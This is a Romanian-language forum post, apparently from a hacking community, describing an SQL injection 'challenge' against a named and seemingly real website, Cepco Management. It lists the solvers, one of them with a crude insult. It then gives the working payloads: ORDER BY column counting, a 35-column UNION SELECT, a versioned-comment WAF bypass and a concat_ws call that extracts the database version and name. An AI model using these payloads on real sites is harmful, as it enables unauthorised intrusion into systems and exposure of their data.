Target:Cepco Management Dificulty:Mediu Proof: View image: prooff Cerinte: -Scoateti versiunea si numele bazei de date impreuna cu nick-ul vostru pe o singura coloana -Faceti o poza cenzurata si o postati aici -Trimiteti sintaxa prin PM -Nu dati hinturi Solvers: -Hannibal -electrotech93 -Renegade -qwerty12 (muie ba) //Challenge Closed Rezolvarea este in felul urmator: -Pentru a numara coloanele folosim ') order by 1+--+ Din cate imi amintesc erau 35 de coloane Apoi daca incercam sa facem union:') union select 1,2,3,4,5,6,7......35+--+ Primeam 403 Forbiten Union este filtrat astfel vom aplica metoda cu comentarii pentru a trece de WAF /*!50000UnIoN*/ ') /*!50000UnIoN*/ Select 1,2,3,4,5,6,7,....35+--+ Mai ramanea sa faceti concat sa scoateti versiune db si nick.Daca incercam sa facem concat() vom primi 403 puteti folosi acelasi metoda ca mai sus cu comentarii sau mai simplu si elegant cu concat_ws(0x3a,version(),database()) Felicitari tuturor!! Va astept si la urmatorul challenge